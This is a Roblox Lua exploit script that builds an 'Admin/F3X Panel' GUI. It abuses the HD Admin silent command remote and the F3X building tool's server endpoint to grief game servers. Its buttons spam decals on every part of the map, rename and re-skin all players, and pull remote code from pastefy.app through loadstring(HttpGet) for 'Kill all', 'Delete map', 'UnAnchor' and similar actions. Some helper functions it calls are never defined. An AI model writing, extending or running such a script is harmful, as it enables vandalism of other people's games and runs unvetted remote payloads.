local ReplicatedStorage = game:GetService("ReplicatedStorage")
local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommandSilent
local Players = game:GetService("Players")
local player = game.Players.LocalPlayer
local char = player.Character
local backpack = player.Backpack
pcall(function() player:WaitForChild("PlayerGui"):FindFirstChild("Admin/F3X Panel"):Destroy() end)
local gui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
gui.Name = "Admin/F3X Panel"
gui.ResetOnSpawn = false

local frame = Instance.new("Frame", gui)
frame.Position = UDim2.new(0, 350, 0, 50)
frame.Size = UDim2.new(0, 150, 0, 220)
frame.BackgroundColor3 = Color3.new(0, 0, 0)
frame.Active = true
frame.Draggable = true
frame.BackgroundTransparency = 0
Instance.new("UIStroke", frame).Color =  Color3.new(5, 5, 5)
Instance.new("UICorner", frame).CornerRadius = UDim.new(0, 3)

local frame2 = Instance.new("Frame", frame)
frame2.Position = UDim2.new(0, 0, 0, 0)
frame2.Size = UDim2.new(0, 150, 0, 220)
frame2.BackgroundColor3 = Color3.new(0, 0, 0)
Instance.new("UICorner", frame2).CornerRadius = UDim.new(0, 3)

local KP = Instance.new("Frame", frame2)
KP.Position = UDim2.new(0, 0, 0, 35)
KP.Size = UDim2.new(0, 150, 0, 1)
KP.BackgroundColor3 = Color3.new(1, 1, 1)
KP.BorderSizePixel = 0

local KP2 = Instance.new("Frame", frame2)
KP2.Position = UDim2.new(0, 0, 0, 185)
KP2.Size = UDim2.new(0, 150, 0, 1)
KP2.BackgroundColor3 = Color3.new(1, 1, 1)
KP2.BorderSizePixel = 0

local toggle = Instance.new("TextButton", frame)
toggle.Position = UDim2.new(0, 122, 0, 8)
toggle.Size = UDim2.new(0, 20, 0, 20)
toggle.BackgroundColor3 = Color3.new(0, 0, 0)
toggle.Text = "+"
toggle.Font = Enum.Font.Gotham
toggle.TextColor3 = Color3.new(255, 255, 255)
toggle.TextSize = 19

local Uis = Instance.new("UIStroke", toggle)
Uis.Color = Color3.new(1, 1, 1)
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", toggle).CornerRadius = UDim.new(0, 3)

local scroll = Instance.new("ScrollingFrame", frame2)
scroll.Size = UDim2.new(0, 148, 0, 146)
scroll.Position = UDim2.new(0, 1, 0, 37)
scroll.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
scroll.ScrollBarThickness = 0
scroll.CanvasSize = UDim2.new(0, 0, 4, 0)
scroll.BackgroundTransparency = 0
Instance.new("UIStroke", scroll).Color =  Color3.new(0, 0, 0)

local Box = Instance.new("TextBox", frame2)
Box.PlaceholderText = "Text/ID..."
Box.Position = UDim2.new(0, 35, 0, 188)
Box.Size = UDim2.new(0, 80, 0, 30)
Box.TextSize = 12
Box.TextColor3 = Color3.new(1, 1, 1)
Box.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Box.Font = Enum.Font.Gotham
Box.Text = "129988826233934"
Box.ClearTextOnFocus = true
Box.TextWrapped = true

local Uis = Instance.new("UIStroke", Box)
Uis.Color = Color3.new(1, 1, 1)
Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
Instance.new("UICorner", Box).CornerRadius = UDim.new(0, 2)

local function createTextButton(position, size, textSize, text, parent)
    local btn = Instance.new("TextButton")
    btn.Name = "Button"
    btn.Position = position
    btn.Size = size
    btn.BackgroundColor3 = Color3.new(0,0,0)
    btn.TextSize = textSize
    btn.Text = text
    btn.TextColor3 = Color3.new(1,1,1)
    btn.Font = Enum.Font.SourceSans
    btn.Parent = parent
    Instance.new("UICorner",btn).CornerRadius=UDim.new(0,3)
    local Uis = Instance.new("UIStroke", btn)
    Uis.Color = Color3.new(1,1,1)
    Uis.ApplyStrokeMode = Enum.ApplyStrokeMode.Border
    return btn
end

local cmdb2 = createTextButton(UDim2.new(0, 118, 0, 188), UDim2.new(0, 30, 0, 30), 8, "Cmdbar2", frame2)
cmdb2.MouseButton1Click:Connect(function()
RequestCommand:InvokeServer(";cmdbar2")
end)

local f3x = createTextButton(UDim2.new(0, 2, 0, 188), UDim2.new(0, 30, 0, 30), 14, "F3X", frame2)
f3x.MouseButton1Click:Connect(function()
RequestCommand:InvokeServer(";btools")
end)

local Sky = createTextButton(UDim2.new(0, 3, 0, 3), UDim2.new(0, 70, 0, 35), 14, "Skybox", scroll)
Sky.MouseButton1Click:Connect(function()
local function getf3x()
         for _, v in ipairs(backpack:GetChildren()) do
            if v:FindFirstChild("SyncAPI") then
               return v
            end
         end
         for _, v in ipairs(char:GetChildren()) do
            if v:FindFirstChild("SyncAPI") then
               return v
            end
         end
         return nil
      end
      local f3x = getf3x()
      if not f3x then
         warn("you dont have f3x")
    end
      local syncapi = f3x.SyncAPI
      local serverendpoint = syncapi.ServerEndpoint
      local function sky()
         spawn(function()
            local position = char.Head.Position
            local part = serverendpoint:InvokeServer("CreatePart", "Normal", CFrame.new(position + Vector3.new(0, 2, 0)), workspace)
            local args = {
               [1] = "CreateMeshes",
               [2] = {
                  [1] = {
                     ["Part"] = part
                  }
               }
            }
            serverendpoint:InvokeServer(unpack(args))
            local args = {
               [1] = "SyncMesh",
               [2] = {
                  [1] = {
                     ["Part"] = part,
                     ["MeshId"] = "rbxassetid://8006679977"
                  }
               }
            }
            serverendpoint:InvokeServer(unpack(args))
            local args = {
               [1] = "SyncMesh",
               [2] = {
                  [1] = {
                     ["Part"] = part,
                     ["Scale"] = Vector3.new(500, 500, 500)
                  }
               }
            }
            serverendpoint:InvokeServer(unpack(args))
            local args = {
               [1] = "SyncMesh",
               [2] = {
                  [1] = {
                     ["Part"] = part,
                     ["TextureId"] = "rbxassetid://"..Box.Text
                  }
               }
            }
            serverendpoint:InvokeServer(unpack(args))
            name(part, "Sky")
            lock(part, true)
            setcollision(part, false)
      end)
   end
   sky()
end)

local Decal = createTextButton(UDim2.new(0, 76, 0, 3), UDim2.new(0, 70, 0, 35), 14, "Decal", scroll)
Decal.MouseButton1Click:Connect(function()
local function getf3x()
         for _, v in ipairs(backpack:GetChildren()) do
            if v:FindFirstChild("SyncAPI") then
               return v
            end
         end
         for _, v in ipairs(char:GetChildren()) do
            if v:FindFirstChild("SyncAPI") then
               return v
            end
         end
         return nil
      end
      local f3x = getf3x()
      if not f3x then
         warn("you dont have f3x")
    end
      local syncapi = f3x.SyncAPI
      local serverendpoint = syncapi.ServerEndpoint
      local function createdecal(part, side)
         local args = {
            [1] = "CreateTextures",
            [2] = {
               [1] = {
                  ["Part"] = part,
                  ["Face"] = side,
                  ["TextureType"] = "Decal"
               }
            }
         }
         serverendpoint:InvokeServer(unpack(args))
      end
      local function setdecal(part, asset, side)
         local args = {
            [1] = "SyncTexture",
            [2] = {
               [1] = {
                  ["Part"] = part,
                  ["Face"] = side,
                  ["TextureType"] = "Decal",
                  ["Texture"] = "rbxassetid://".. asset
               }
            }
         }
         serverendpoint:InvokeServer(unpack(args))
      end
      local function decalspam()
         local decalid = Box.Text
         for _, v in ipairs(workspace:GetDescendants()) do
            if v:IsA("BasePart") or v:IsA("UnionOperation") then
               spawn(function()
                  createdecal(v, Enum.NormalId.Front)
                  createdecal(v, Enum.NormalId.Back)
                  createdecal(v, Enum.NormalId.Left)
                  createdecal(v, Enum.NormalId.Right)
                  createdecal(v, Enum.NormalId.Bottom)
                  createdecal(v, Enum.NormalId.Top)
                  setdecal(v, decalid, Enum.NormalId.Front)
                  setdecal(v, decalid, Enum.NormalId.Back)
                  setdecal(v, decalid, Enum.NormalId.Left)
                  setdecal(v, decalid, Enum.NormalId.Right)
                  setdecal(v, decalid, Enum.NormalId.Bottom)
                  setdecal(v, decalid, Enum.NormalId.Top)
            end)
         end
      end
   end
   decalspam()
end)

local s = createTextButton(UDim2.new(0, 3, 0, 41), UDim2.new(0, 70, 0, 35), 14, "Sound", scroll)
s.MouseButton1Click:Connect(function()
RequestCommand:InvokeServer(";music "..Box.Text)
end)

local board = createTextButton(UDim2.new(0, 76, 0, 41), UDim2.new(0, 70, 0, 35), 14, "Billboard", scroll)
board.MouseButton1Click:Connect(function()
RequestCommand:InvokeServer(";name all "..Box.Text)
RequestCommand:InvokeServer(";titler all "..Box.Text)
RequestCommand:InvokeServer(";ctag all "..Box.Text.." red")
RequestCommand:InvokeServer(";cname all "..Box.Text.." red")
end)

local chr = createTextButton(UDim2.new(0, 3, 0, 79), UDim2.new(0, 70, 0, 35), 14, "Char all", scroll)
chr.MouseButton1Click:Connect(function()
RequestCommand:InvokeServer(";char all "..Box.Text)
end)

local base = createTextButton(UDim2.new(0, 76, 0, 79), UDim2.new(0, 70, 0, 35), 14, "Baseplate", scroll)
base.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/A9Yzicrs/raw"))();
end)

local kill = createTextButton(UDim2.new(0, 3, 0, 117), UDim2.new(0, 70, 0, 35), 14, "Kill all", scroll)
kill.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/bsfsgJnD/raw"))();
end)

local color = createTextButton(UDim2.new(0, 76, 0, 117), UDim2.new(0, 70, 0, 35), 13, "Loop Color", scroll)
color.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/kzTbADqG/raw"))();
end)

local unc = createTextButton(UDim2.new(0, 3, 0, 155), UDim2.new(0, 143, 0, 35), 14, "UnAnchor", scroll)
unc.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/loZZ2WYK/raw"))();
end)

local delete = createTextButton(UDim2.new(0, 3, 0, 193), UDim2.new(0, 70, 0, 35), 13, "Delete map", scroll)
delete.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/pnJkjxAs/raw"))();
end)

local nuke = createTextButton(UDim2.new(0, 76, 0, 193), UDim2.new(0, 70, 0, 35), 14, "Nuke", scroll)
nuke.MouseButton1Click:Connect(function()

end)

local spooky = createTextButton(UDim2.new(0, 3, 0, 231), UDim2.new(0, 70, 0, 35), 10, "Spooky Skeleton", scroll)
spooky.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("https://pastefy.app/nPiBPG7n/raw"))()
end)

local hell = createTextButton(UDim2.new(0, 76, 0, 231), UDim2.new(0, 70, 0, 35), 16, "666", scroll)
hell.MouseButton1Click:Connect(function()

end)

-- Function
toggle.MouseButton1Click:Connect(function()
if frame2.Visible then
    frame2.Visible = false
    frame:TweenSize(UDim2.new(0, 150, 0, 35), "Out", "Quart", 0.4, true)
else
    frame:TweenSize(UDim2.new(0, 150, 0, 220), "Out", "Quart", 0.4, true)
wait(0.2)
    frame2.Visible = true
    end
end)
